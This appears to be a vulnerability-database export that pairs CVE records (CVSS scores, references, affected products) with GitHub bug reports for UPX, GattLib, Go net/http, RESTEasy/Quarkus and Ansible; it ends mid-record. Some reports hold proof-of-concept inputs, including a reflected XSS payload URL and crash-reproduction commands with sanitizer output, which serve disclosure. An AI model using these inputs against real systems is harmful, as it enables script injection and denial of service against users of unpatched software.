{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948696" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/28e761cd42211dfe0124b7a29b2f74730f453e46" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/486" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/pull/487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948696" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/28e761cd42211dfe0124b7a29b2f74730f453e46" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/486" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/pull/487" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/upx/upx/issues/486
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
<!--- IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE. Just read it and fill in the details we're asking, it saves so much of our time. Thanks! --> ## What's the problem (or question)? <!--- If describing a bug, tell us what happens instead of the expected behavior --> <!--- If suggesting a change/improvement, explain the difference from current behavior --> Same problem like [issue 448](https://github.com/upx/upx/issues/448)but not fix all the bug position. MemBuffer is attempted to be allocated with 0 bytes, failing an assertion in mem.cpp. asan ``` ./upx.out -d abort01 Ultimate Packer for eXecutables Copyright (C) 1996 - 2021 UPX git-2638be+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 1st 2021 File size Ratio Format Name -------------------- ------ ----------- ----------- upx.out: mem.cpp:216: void MemBuffer::alloc(upx_uint64_t): Assertion `size > 0' failed. [1] 1517141 abort ./upx.out -d abort01 ``` gdb ``` gef➤ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7a38859 in __GI_abort () at abort.c:79 #2 0x00007ffff7a38729 in __assert_fail_base (fmt=0x7ffff7bce588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0xa54aa0 <str> "size > 0", file=0xa544b0 "mem.cpp", line=0xd8, function=<optimized out>) at assert.c:92 #3 0x00007ffff7a49f36 in __GI___assert_fail (assertion=0xa54aa0 <str> "size > 0", file=0xa544b0 "mem.cpp", line=0xd8, function=0xa54a40 <__PRETTY_FUNCTION__._ZN9MemBuffer5allocEy> "void MemBuffer::alloc(upx_uint64_t)") at assert.c:101 #4 0x0000000000550503 in MemBuffer::alloc (this=0x61a000001458, size=0x0) at mem.cpp:216 #5 0x00000000007833c1 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::canUnpack (this=0x61a000001280) at p_mach.cpp:1555 #6 0x0000000000942adb in try_unpack (p=0x61a000001280, user=0x7fffffffbe30) at packmast.cpp:114 #7 0x00000000009407ce in PackMaster::visitAllPackers (func=0x9425c0 <try_unpack(Packer*, void*)>, f=0x7fffffffbe30, o=0x7fffffffc4e8, user=0x7fffffffbe30) at packmast.cpp:225 #8 0x0000000000942428 in PackMaster::getUnpacker (f=0x7fffffffbe30) at packmast.cpp:248 #9 0x000000000094359b in PackMaster::unpack (this=0x7fffffffc4d0, fo=0x7fffffffbf40) at packmast.cpp:266 #10 0x0000000000a16d11 in do_one_file (iname=0x7fffffffdfb7 "abort_01", oname=0x7fffffffd0a0 "abort_01.007") at work.cpp:157 #11 0x0000000000a18c16 in do_files (i=0x2, argc=0x3, argv=0x7fffffffdbd8) at work.cpp:269 #12 0x00000000005359b3 in upx_main (argc=0x3, argv=0x7fffffffdbd8) at main.cpp:1516 #13 0x0000000000539d77 in main (argc=0x3, argv=0x7fffffffdbd8) at main.cpp:1584 gef➤ frame 4 #4 0x0000000000550503 in MemBuffer::alloc (this=0x61a000001458, size=0x0) at mem.cpp:216 216 assert(size > 0); gef➤ frame 5 #5 0x00000000007833c1 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::canUnpack (this=0x61a000001280) at p_mach.cpp:1555 1555 rawmseg_buf.alloc(mhdri.sizeofcmds); gef➤ p mhdri.sizeofcmds $7 = { d = "\000\000\000" } ``` ## What should have happened? <!--- If you're describing a bug, tell us what should happen --> <!--- If you're suggesting a change/improvement, tell us how it should work --> No failed assertions. ## Do you have an idea for a solution? <!--- Not obligatory, but suggest a fix/reason for the bug, --> <!--- or ideas how to implement the addition or change --> Either remove the assertion (probably easier), or add logic to check that allocations are > 0 bytes. or like the [ c55b570](https://github.com/upx/upx/commit/c55b57088daa4a95185b4b7355dac79a0f2cd65e) add some sanitize code. ## How can we reproduce the issue? <!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant --> 1.Build UPX ``` export BUILD_TYPE_DEBUG=1 make all ``` 2. Run ``` ./src/upx.out -d poc ``` zipped poc : [alloc_abort01.zip](https://github.com/upx/upx/files/6269446/alloc_abort01.zip) ## Please tell us details about your environment. <!--- Include as many relevant details about the environment you experienced the bug in --> * UPX version used (`upx --version`): ``` ./upx.out --version upx 4.0.0-git-2638bee3c0f7+ UCL data compression library 1.03 zlib data compression library 1.2.11 LZMA SDK version 4.43 ``` * Host Operating System and version: `OS: Ubuntu 20.04.2 LTS x86_64` * Host CPU architecture: `CPU: Intel i5-4590 (4) @ 3.700GHz` * Target Operating System and version: `same as Host` * Target CPU architecture: `same as Host` reporter: chiba of Topsec alphalab
MemBuffer assertions again in function MemBuffer::alloc()
https://api.github.com/repos/upx/upx/issues/486/comments
0
2021-04-07T07:13:11Z
2021-04-23T06:56:03Z
https://github.com/upx/upx/issues/486
852,090,320
486
1,999
CVE-2021-33590
2021-05-27T11:15:07.407
GattLib 0.3-rc1 has a stack-based buffer over-read in get_device_path_from_mac in dbus/gattlib.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/labapart/gattlib/issues/219" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/labapart/gattlib/issues/219" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:labapart:gattlib:0.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "357B94A7-EFAC-4F05-A0CC-2A1985A31ABC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/labapart/gattlib/issues/219
[ "Exploit", "Third Party Advisory" ]
github.com
[ "labapart", "gattlib" ]
Hi Team, Stack based buffer overflow is observed in [read_write.c](https://github.com/labapart/gattlib/blob/master/examples/read_write/read_write.c) and [gattlib.c](https://github.com/labapart/gattlib/blob/master/dbus/gattlib.c) while fuzzing **GATTLIB (releases - master, v0.3-rc1, dev, various-fixes)** using **CLANG** with **AFL FUZZER** **Vulnerable code from read_write.c -** connection = gattlib_connect(NULL, argv[1], GATTLIB_CONNECTION_OPTIONS_LEGACY_DEFAULT); if (connection == NULL) { fprintf(stderr, "Fail to connect to the bluetooth device.\n"); return 1; } **Vulnerable code from gattlib.c -** get_device_path_from_mac(adapter_name, dst, object_path, sizeof(object_path)); // Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87' strncpy(device_address_str, mac_address, sizeof(device_address_str)); for (int i = 0; i < strlen(device_address_str); i++) { if (device_address_str[i] == ':') { device_address_str[i] = '_'; } } **Steps to Reproduce -** cd <gattlib-src-root> mkdir build && cd build cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -fsanitize=leak -g" -DCMAKE_C_FLAGS="-fsanitize=address -fsanitize=leak -g" make ./examples/read_write/read_write 11111111111111111111111111111111111 read 00002a29-0000-1000-8000-00805f9b34fb **ASAN output -** ================================================================= ==72493==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc83cd4d95 at pc 0x00000042efb9 bp 0x7ffc83cd4d50 sp 0x7ffc83cd4510 READ of size 22 at 0x7ffc83cd4d95 thread T0 -0 0x42efb8 in strlen (/home/zero/newfuz/gattlib/build/examples/read_write/read_write+0x42efb8) -1 0x7fb3c462c532 in get_device_path_from_mac /home/zero/newfuz/gattlib/dbus/gattlib.c:114:22 -2 0x7fb3c462c532 in gattlib_connect /home/zero/newfuz/gattlib/dbus/gattlib.c:150:2 -3 0x4c471b in main /home/zero/newfuz/gattlib/examples/read_write/read_write.c:71:15 -4 0x7fb3c394e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 -5 0x41c38d in _start (/home/zero/newfuz/gattlib/build/examples/read_write/read_write+0x41c38d) Address 0x7ffc83cd4d95 is located in stack of thread T0 at offset 53 in frame -0 0x7fb3c462c2bf in gattlib_connect /home/zero/newfuz/gattlib/dbus/gattlib.c:136 This frame has 3 object(s): [32, 53) 'device_address_str.i' (line 103) <== Memory access at offset 53 overflows this variable [96, 104) 'error' (line 140) [128, 228) 'object_path' (line 141) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/zero/newfuz/gattlib/build/examples/read_write/read_write+0x42efb8) in strlen Shadow bytes around the buggy address: 0x100010792960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100010792970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100010792980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100010792990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000107929a0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 =>0x1000107929b0: 00 00[05]f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 0x1000107929c0: 00 00 00 00 00 00 00 00 04 f3 f3 f3 f3 f3 f3 f3 0x1000107929d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000107929e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x1000107929f0: 00 f2 f2 f2 f8 f2 f2 f2 f8 f8 f8 f8 f8 f2 f2 f2 0x100010792a00: f2 f2 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==72493==ABORTING **Request team to implement proper patch and validate**
stack_based buffer
https://api.github.com/repos/labapart/gattlib/issues/219/comments
0
2021-05-27T07:57:08Z
2021-05-27T21:20:41Z
https://github.com/labapart/gattlib/issues/219
903,368,145
219
2,000
CVE-2021-31525
2021-05-27T13:15:08.207
net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/45710" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/45710" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-02" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCA080B5-DEFB-462A-8908-2EBD5D2075D8", "versionEndExcluding": "1.15.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "matchCriteriaId": "644F0433-E29C-4748-BDA9-5332DF7CBE14", "versionEndExcluding": "1.16.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/golang/go/issues/45710
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "golang", "go" ]
`ReadRequest` and `ReadResponse` in net/http can hit an unrecoverable panic when reading a very large header (over 7MB on 64-bit architectures, or over 4MB on 32-bit ones). `Transport` and `Client` are vulnerable and the program can be made to crash by a malicious server. `Server` is not vulnerable by default, but can be if the default max header of 1MB is overridden by setting `Server.MaxHeaderBytes` to a higher value, in which case the program can be made to crash by a malicious client. This also affects golang.org/x/net/http2/h2c and `HeaderValuesContainsToken` in golang.org/x/net/http/httpguts, and is fixed in golang.org/x/net@v0.0.0-20210428140749-89ef3d95e781. This is CVE-2021-31525. According to the new security policy (#44918), this will be fixed as a PUBLIC track issue. Credit to [Guido Vranken](https://twitter.com/GuidoVranken) who reported the crash as part of the [Ethereum 2.0 bounty program](https://ethereum.org/en/eth2/get-involved/bug-bounty). /cc @golang/security
net/http: ReadRequest can stack overflow due to recursion with very large headers
https://api.github.com/repos/golang/go/issues/45710/comments
10
2021-04-22T19:53:59Z
2022-06-23T10:41:20Z
https://github.com/golang/go/issues/45710
865,413,512
45,710
2,001
CVE-2020-10688
2021-05-27T19:15:07.643
A cross-site scripting (XSS) flaw was found in RESTEasy in versions before 3.11.1.Final and before 4.5.3.Final, where it did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1814974" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quarkusio/quarkus/issues/7248" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Permissions Required", "Vendor Advisory" ], "url": "https://issues.redhat.com/browse/RESTEASY-2519" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210706-0008/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1814974" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quarkusio/quarkus/issues/7248" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Permissions Required", "Vendor Advisory" ], "url": "https://issues.redhat.com/browse/RESTEASY-2519" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210706-0008/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "077732DB-F5F3-4E9C-9AC0-8142AB85B32F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "B8423D7F-3A8F-4AD8-BF51-245C9D8DD816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "ADB40F59-CAAE-47D6-850C-12619D8D5B34", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:resteasy:*:*:*:*:*:*:*:*", "matchCriteriaId": "C93D5599-3FD3-4285-8366-3790048C542D", "versionEndExcluding": "3.11.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:resteasy:*:*:*:*:*:*:*:*", "matchCriteriaId": "546D0E74-C88A-446F-B317-745350DC3C8A", "versionEndExcluding": "4.5.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.5.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "645A908C-18C2-4AB1-ACE7-3969E3A552A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "79" ]
79
https://github.com/quarkusio/quarkus/issues/7248
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "quarkusio", "quarkus" ]
**Description** The no resource endpoint HTML page which is rendered on 404 errors introduces XSS vulnerability. Given as an example a GET endpoint which accepts a paging parameter in the form "start,offset" (i.e. 0,10). A request like: `/users?paging=0%2c-1sp137%3Cscript%3Ealert(1)%3C%2fscript%3Emzx4u` would lead to the following exception, and the 404 page in turn would execute the script (alert in our case). `RESTEASY003870: Unable to extract parameter from http request: javax.ws.rs.QueryParam("paging") value is '0,-1sp137<script>alert(1)</script>mzx4u'` **Implementation ideas** Enable the 404 HTML page only in DEV mode.
XSS vulnerability in NotFoundExceptionMapper
https://api.github.com/repos/quarkusio/quarkus/issues/7248/comments
10
2020-02-18T08:07:18Z
2020-03-26T23:32:09Z
https://github.com/quarkusio/quarkus/issues/7248
566,716,690
7,248
2,002
CVE-2020-10729
2021-05-27T19:15:07.880
A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831089" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/34144" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831089" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/34144" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
